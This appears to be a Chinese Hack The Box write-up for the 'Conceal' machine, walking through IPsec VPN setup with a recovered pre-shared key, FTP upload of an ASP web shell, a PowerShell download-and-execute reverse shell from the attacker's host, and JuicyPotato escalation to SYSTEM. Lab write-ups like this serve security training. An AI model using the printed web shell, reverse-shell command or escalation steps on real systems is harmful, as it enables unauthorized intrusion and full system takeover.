# This file holds shared secrets or RSA private keys for authentication.

%any : PSK "Dudecake1!"

14、下一个,ipsec.conf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# ipsec.conf - strongSwan IPsec configuration file

config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no

conn conceal
    authby=secret
    auto=add
    ike=3des-sha1-modp1024!
    esp=3des-sha1!
    type=transport
    keyexchange=ikev1
    left=10.10.14.30
    right=10.10.10.116
    rightsubnet=10.10.10.116[tcp]


charondebug="all"- 更详细地帮助我排除连接故障。
authby="secret"- 使用 PSK 验证。
ike、esp、 和keyexchange是根据来自 的信息设置的ike-scan。
left并right代表我的计算机和目标计算机。
type=transport- 使用 ipsec 传输模式连接主机到主机。

15、接下来开始启动并使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo vim /etc/ipsec.secrets    
[sudo] kali 的密码:
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo vim /etc/ipsec.conf 

启动IPSec VPN:表示VPN配置正确。

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo ipsec start --nofork
Starting strongSwan 5.9.13 IPsec [starter]...
charon is already running (/var/run/charon.pid exists) -- skipping daemon start
starter is already running (/var/run/starter.charon.pid exists) -- no fork done


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo ipsec restart 
Stopping strongSwan IPsec...
Starting strongSwan 5.9.13 IPsec [starter]...


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo ipsec up conceal 
initiating Main Mode IKE_SA conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (176 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA conceal[1] established between 10.10.14.30[10.10.14.30]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10075s
maximum IKE_SA lifetime 10615s
generating QUICK_MODE request 2660796471 [ HASH SA No ID ID ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (164 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (188 bytes)
parsed QUICK_MODE response 2660796471 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA conceal{1} established with SPIs c06195be_i 6782a96a_o and TS 10.10.14.30/32 === 10.10.10.116/32[tcp]
connection 'conceal' established successfully

16、连接 VPN 后,我可以重新开始侦察并看到更多内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.116 -oG allports -Pn -sT
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 03:37 CST
Warning: 10.10.10.116 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.116
Host is up (0.12s latency).
Not shown: 50553 filtered tcp ports (no-response), 14974 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49664/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 79.06 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
21,80,135,139,445,49664,49667,49669, 
           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,80,135,139,445,49664,49667,49669 --min-rate=10000 -sC -sV -sT -Pn 10.10.10.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 03:40 CST
Nmap scan report for 10.10.10.116
Host is up (0.12s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -7h39m49s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-14T12:02:12
|_  start_date: 2024-04-14T08:02:58

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.04 seconds

17、查看网站信息

http://10.10.10.116/

18、尝试目录扫描,已发现一些信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://10.10.10.116/                                                                                                                            

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_10.10.10.116/__24-04-15_03-47-42.txt

Target: http://10.10.10.116/

[03:47:42] Starting:
[03:52:09] 301 -  150B  - /Upload  ->  http://10.10.10.116/Upload/          
[03:52:09] 301 -  150B  - /upload  ->  http://10.10.10.116/upload/          
[03:52:09] 200 -  177B  - /upload/
Task Completed


┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://10.10.10.116/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.116/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# directory-list-2.3-small.txt [Status: 200, Size: 696, Words: 26, Lines: 32, Duration: 157ms]
upload                  [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 315ms]
Upload                  [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 521ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

19、查看目录信息

http://10.10.10.116/upload/

20、结合上面的ftp端口,可以匿名访问,我们尝试一下是否可以上传文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp 10.10.10.116          
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49676|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> put hash
local: hash remote: hash
229 Entering Extended Passive Mode (|||49677|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************************|    34      342.29 KiB/s    --:-- ETA
226 Transfer complete.
34 bytes sent in 00:00 (0.26 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49678|)
125 Data connection already open; Transfer starting.
04-14-24  01:17PM                   34 hash
226 Transfer complete.
ftp>

21、查看是否上传在这个网站目录里

http://10.10.10.116/upload/

22、这里成功上传上去了,接下来就是上次一个asp的shell了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat /usr/share/webshells/asp/cmdasp.asp 
<%@ Language=VBScript %>
<%
  ' --------------------o0o--------------------
  '  File:    CmdAsp.asp
  '  Author:  Maceo <maceo @ dogmile.com>
  '  Release: 2000-12-01
  '  OS:      Windows 2000, 4.0 NT
  ' -------------------------------------------

root@kali# cat /opt/shells/asp/cmd.asp 
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp 10.10.10.116      
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49684|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> put ./cmdasp.asp 
local: ./cmdasp.asp remote: ./cmdasp.asp
229 Entering Extended Passive Mode (|||49685|)
150 Opening ASCII mode data connection.
100% |*******************************************************************************************************************************************|  1581       11.59 MiB/s    --:-- ETA
226 Transfer complete.
1581 bytes sent in 00:00 (12.15 KiB/s)
ftp>

http://10.10.10.116/upload/cmdasp.asp

http://10.10.10.116/upload/cmdasp.asp?id=1

23、这里说明木马会被清除掉,那我们加快速度构建一个存在使用的连接进程,这样就删不了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80                                                                                  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.116 - - [15/Apr/2024 04:27:22] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -


http://10.10.10.116/upload/1.asp?cmd=powershell%20iex(New-Object%20Net.Webclient).downloadstring(%27http://10.10.14.30/Invoke-PowerShellTcp.ps1%27)

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443            
listening on [any] 443 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.116] 49696
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv>

24、这里就获取到了一个初始shell环境,

25、开始信息枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
PS C:\Windows\SysWOW64\inetsrv> whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv> cd C:/
PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
d-----       27/11/2018     16:01                admin_checks                                     
d-----       12/10/2018     23:10                inetpub                                          
d-----       14/04/2024     13:44                Microsoft                                        
d-----       18/03/2017     21:03                PerfLogs                                         
d-r---       12/10/2018     20:10                Program Files                                    
d-r---       17/03/2021     15:53                Program Files (x86)                              
d-r---       12/10/2018     23:54                Users                                            
d-----       17/03/2021     14:55                Windows                                          


PS C:\> cd Users
PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
d-----       12/10/2018     23:07                Administrator                                    
d-----       12/10/2018     23:12                DefaultAppPool                                   
d-----       12/10/2018     20:16                Destitute                                        
d-r---       12/10/2018     20:08                Public                                           
d-----       12/10/2018     23:54                test                                             
d-----       12/10/2018     23:40                WWW Anon Access                                  


PS C:\Users> cd Public
PS C:\Users\Public> ls


    Directory: C:\Users\Public


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
d-r---       18/03/2017     21:03                Documents                                        
d-r---       18/03/2017     21:03                Downloads                                        
d-r---       18/03/2017     21:03                Music                                            
d-r---       18/03/2017     21:03                Pictures                                         
d-r---       18/03/2017     21:03                Videos                                           


PS C:\Users\Public> cd ../test
PS C:\Users\test> ls
PS C:\Users\test> ls : Access to the path 'C:\Users\test' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\Users\test:String) [Get-ChildItem], Unauthori 
   zedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildIt 
   emCommand
 

PS C:\Users\test> cd ../"WWW Anon Access"
PS C:\Users\WWW Anon Access> ls
PS C:\Users\WWW Anon Access> ls : Access to the path 'C:\Users\WWW Anon Access' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\Users\WWW Anon Access:String) [Get-ChildItem] 
   , UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildIt 
   emCommand
 

PS C:\Users\WWW Anon Access> cd ../
PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
d-----       12/10/2018     23:07                Administrator                                    
d-----       12/10/2018     23:12                DefaultAppPool                                   
d-----       12/10/2018     20:16                Destitute                                        
d-r---       12/10/2018     20:08                Public                                           
d-----       12/10/2018     23:54                test                                             
d-----       12/10/2018     23:40                WWW Anon Access                                  


PS C:\Users> cd Destiute
PS C:\Users> cd : Cannot find path 'C:\Users\Destiute' because it does not exist.
At line:1 char:1
+ cd Destiute
+ ~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Destiute:String) [Set-Location], ItemNotF 
   oundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
 

PS C:\Users>

26、还是获取下第一个flag吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\> cd C:\users\destitute\desktop\
PS C:\users\destitute\desktop> ls


    Directory: C:\users\destitute\desktop


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
-a----       14/04/2024     09:03             34 proof.txt                                        
-ar--l       02/11/2022     14:55              0 user.txt                                         


PS C:\users\destitute\desktop> cat proof.txt
7c6086deb2bf7130762b2dadaea072c9
PS C:\users\destitute\desktop> cat user.txt
7c6086deb2bf7130762b2dadaea072c9
PS C:\users\destitute\desktop>

0x02 系统权限获取

27、分析当前用户权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS C:\users\destitute\desktop> whoami
conceal\destitute
PS C:\users\destitute\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
PS C:\users\destitute\desktop> 
PS C:\users\destitute\desktop>

28、这里满足土豆提权的权限,呢就直接土豆提权吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
PS C:\users\destitute\desktop> iwr -uri http://10.10.14.30/JuicyPotato.exe -Outfile ./JuicyPotato.exe
PS C:\users\destitute\desktop> iwr -uri http://10.10.14.30/shell.bat -Outfile ./shell.bat
PS C:\users\destitute\desktop> ls


    Directory: C:\users\destitute\desktop


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
-a----       14/04/2024     14:16         347648 JuicyPotato.exe                                  
-a----       14/04/2024     09:03             34 proof.txt                                        
-a----       14/04/2024     14:17           1351 shell.bat                                        
-ar--l       02/11/2022     14:55              0 user.txt                                         


PS C:\users\destitute\desktop>


检查 Win10 Enterprise x64 的 SID,参考。

XblGameSave	{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}	{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}	NT AUTHORITY\SYSTEM

https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_10_Enterprise


.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p .\shell.bat -l 1337  



PS C:\users\destitute\desktop> .\JuicyPotato.exe -z -l 100
PS C:\users\destitute\desktop> ./JuicyPotato.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
PS C:\users\destitute\desktop> .\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p .\shell.bat -l 1337 
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
PS C:\users\destitute\desktop> 


┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 10086
listening on [any] 10086 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.116] 49708

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>

29、读取最终flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
PS C:\Windows\system32> cd C:/Users
PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-----       12/10/2018     23:07                Administrator                 
d-----       12/10/2018     23:12                DefaultAppPool                
d-----       12/10/2018     20:16                Destitute                     
d-r---       12/10/2018     20:08                Public                        
d-----       12/10/2018     23:54                test                          
d-----       12/10/2018     23:40                WWW Anon Access               


PS C:\Users> cd Administrator/Desktop
PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----       14/04/2024     09:03             34 proof.txt                     
-ar--l       02/11/2022     14:56              0 root.txt                      


PS C:\Users\Administrator\Desktop> cat proof.txt
d48deddb6e4be5d252ef775af3ba571b
PS C:\Users\Administrator\Desktop> cat root.txt
d48deddb6e4be5d252ef775af3ba571b
PS C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/168

打靶记
#shooting-range
Conceal-htb-writeup
https://sh1yan.top/2024/04/14/Conceal-htb-writeup/
作者
shiyan
发布于
2024年4月14日
许可协议